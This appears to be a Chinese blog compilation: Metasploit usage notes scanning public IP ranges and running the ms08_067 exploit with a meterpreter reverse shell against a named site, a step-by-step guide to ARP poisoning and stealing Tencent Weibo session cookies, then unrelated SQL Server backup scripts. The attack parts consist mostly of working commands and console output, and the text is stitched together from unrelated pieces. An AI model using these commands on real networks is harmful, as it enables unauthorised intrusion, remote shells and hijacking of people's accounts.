以smb/smb_version的使用如下,可用以列举服务器的操作系统.一般来讲是扫描不出来的.这丫的漏洞都掉牙的. 再破的服务器都补上这洞了.

但是在渗透personal computer的时候,这个命令是很有用的.一般都可以扫出操作系统类型.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS 108.171.217.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1024 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

metasploit中nmap扫描例解

查看metasploit数据库连接状态.metasploit4.0以后版本都自动连接自带数据库.所以,象之前那样load db_mysql然后db_connet没有必要了.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

想要查看db_开头的命令,输入db_连按两下tab健,出如下信息.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

当然,使用help命令未尝不可.

[bash]

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================

Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

msf >

[/bash]

db_nmap用于对主机端口扫描和服务的发现.常用参数如下:

-A : 深层次扫描

-sS : 试图在扫描时隐藏自己.  和 -sI  某ip   这个参数不能同时使用

-sI  某ip:  使用这个”某ip”作为自己扫描时的ip,别人在查看的时候只能发现时这个某ip在扫描他

-oX 文件名 : 把扫描结果导出到 “文件名”文件.  以便于在metasploit中使用db_import来导入这个结果,然后就可以使用db_autopwn来自动入侵拉,对吧

-Pn :  不经过ping . 在扫描之前不使用ping来判断主机是否存活.在longlong ago . ping来判断主机是否存活是可行可靠的.但是自从某牛发现使用

ping可以发起ddos攻击之后,就对ping协议进行了改进和预防.所以,有时候ping不到主机并不代表主机down. 你懂得.

对了还有一个重要的参数:

-v   :显示扫描进度. 否则你会以为nmap死掉了,而不耐烦把它ctrl – c掉..

 

那么, 一个常用的扫描命令例子:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

#省略一大块

[/bash]

然后就是

db_import ieroot

ieroot文件是上面nmap扫描的结果嘛.

然后就是:

load db_autopwn

db_autopwn来自动扫描可利用主机了.

db_autopwn的几个常用参数来说明一下:

-e : 对数据库中扫描结果中的每一个主机都发起攻击

-t : 显示所有匹配的模块

-r : 使用reverse连接,反向连接. 反向连接有好处阿. 穿防火墙就用这个参数了

-x : 根据漏洞来选择攻击模块

-p : 根据端口选择攻击模块. 有很多主机把自己的服务的端口改的一塌糊涂.这个时候用-p要慎重哦

所以.过程如下:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–

msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

session不容易得到阿. 如果得到就使用 session -i 1 来连接第一个session. 其他依次. 得到shell就没有什么好说得了.

 

metasploit生成shellcode的命令msfpayload

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

可以生成各种格式的payload, 使用上述usage中最后一个参数设置.

msfpayload的用法和msfcli的用法类似.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

其余就很明了了.选项的设置使用 类似于 LHOST=192.168.0.222 这样.查看options使用小写字母o.  生成类型使用C,J,X等设置.

 

另外msfencode可以用于对生成的payload或者叫为payload或者叫他后门都可以.来加密.

msfencode -l 查看可用的加密方式

msfencode  -h获得帮助

metasploit msfcli命令用法,示例

msfcli命令为方便metasploit框架和其他的shell交互而设计.

[bash]

root@ieroot:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You’re looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

root@ieroot:~#

[/bash]

查看某一个exploit的options :

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi o
[*] Please wait while we load the module tree…

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

root@ieroot:~#

[/bash]

 

设置options 同时显示payloads的命令如下:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 p
[*] Please wait while we load the module tree…

Compatible payloads
===================

Name Description
—- ———–
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path

#….这里省略n多条

[/bash]

设置好options,payloads然后执行exploit的命令如下:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=www.haotuan.us PAYLOAD=windows/meterpreter/reverse_tcp LHOST=www.ieroot.com E
[*] Please wait while we load the module tree…

______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|

&nbsp;

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 961 exploits – 509 auxiliary – 153 post
+ — –=[ 257 payloads – 28 encoders – 8 nops
=[ svn r15907 updated today (2012.09.28)

RHOST => www.haotuan.us
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => www.ieroot.com
[-] Handler failed to bind to 173.193.106.10:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.haotuan.us:445).

root@ieroot:~#

#至于这个例子里面的www.haotuan.us 和www.ieroot.com再试用的时候分别设为目标机器(受害者)的ip和本机ip

#别忘了分别设定端口哦,亲

[/bash]

 

 

//上述内容来自:metasploit the pentration tester’s guide 这本书 ,仅仅为了方便我个人的查阅

backtrack 劫持cookie

DiS9 TeAm

1、前言

还在用没有加密的wifi看微博吗? 小心您的cookie被人劫持,微博被人盗用!

本文我们将介绍如何使用arpspoof与wireshark和cookie injector脚本来劫持腾讯微博的cookie

 

2、arp毒化

开启内核IP转发:echo ”1″ > /proc/sys/net/ipv4/ip_forward

通过traceroute命令追踪网关地址,我们发现目前网关地址为192.168.2.1

使用arpspoof来进行arp毒化

2.1 通过ifconfig 命令查看目前网络接口名称

2.2使用arpspoof毒化arp并窃取cookie

Arpspoof -i eth1 -t 192.168.2.111 192.168.2.1

目标机器毒化前arp -a

目标机器毒化后arp -a

从这里我们可以到毒化成功了.(小贴士:别忘了第一步的内核IP转发不然目标会断网哦. )

使用wireshark 监听数据.输入过滤器http.cookie contains t.qq.com(小帖子:http.cookie=过滤http协议的cookie,contains t.qq.com=包含内容为t.qq.com)

我们找到

找到cooke 项目复制出来

接下来我们要用firefox greasemonkey里面的cookie injector 脚本

下载地址:https://userscripts.org/scripts/show/119798

注意第一次安装请重启浏览器否则不生效!

 

然后我们使用alt+c呼出cookie injector脚本.

粘贴我们刚刚复制出来的cookie.

点击OK.然后刷新网页

bingo成功进入了腾讯微博.

 

由任何疑问请给我e-mail:hkhdgj@Hotmail.com

 

法律声明:本文仅供技术研究与讨论,如果用于恶意工具与本人,本站无关!

By:Joe Lynch

sql2008数据库备份命令

sqlserver备份两种方式

1. 通过维护计划

2. 通过job运行命令

--差异备份
EXECUTE master.dbo.xp_create_subdir N'D:\pic\RE\TEST'
GO
BACKUP DATABASE [TEST] TO  DISK = N'D:\pic\RE\TEST\TEST_backup_201101051801.bak' 
WITH  DIFFERENTIAL , NOFORMAT, NOINIT,  
NAME = N'TEST_backup_20110105180152', SKIP, REWIND, NOUNLOAD,  STATS = 10
go

--完整备份
BACKUP DATABASE [TEST] TO  DISK = N'D:\pic\RE\TEST_backup_201101051802.bak' 
WITH NOFORMAT, NOINIT,  
NAME = N'TEST_backup_20110105180256', SKIP, REWIND, NOUNLOAD,  STATS = 10
go

--强制还原
--REPLACE覆盖已存在数据库
RESTORE DATABASE TEST 
   FROM DISK = 'C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Backup\TEST.BAK'
   WITH MOVE 'TEST' TO 'D:\pic\TEST.mdf', 
   MOVE 'TEST_log' TO 'D:\pic\TEST_log.ldf',
   STATS = 10, REPLACE
GO

--显示备份列表
RESTORE FILELISTONLY 
   FROM DISK = 'C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Backup\TEST.BAK'
go

生成年月日的备份文件

declare @databasename nvarchar(50)
set @databasename = 'ExtDB'
DECLARE @strPath NVARCHAR(200)
set @strPath = convert(NVARCHAR(19),getdate(),120)
set @strPath = REPLACE(@strPath, ':' , '.')
set @strPath = 'E:\工作目录\bk\' + @databasename+@strPath + '.bak'
BACKUP DATABASE @databasename  TO DISK = @strPath WITH NOINIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT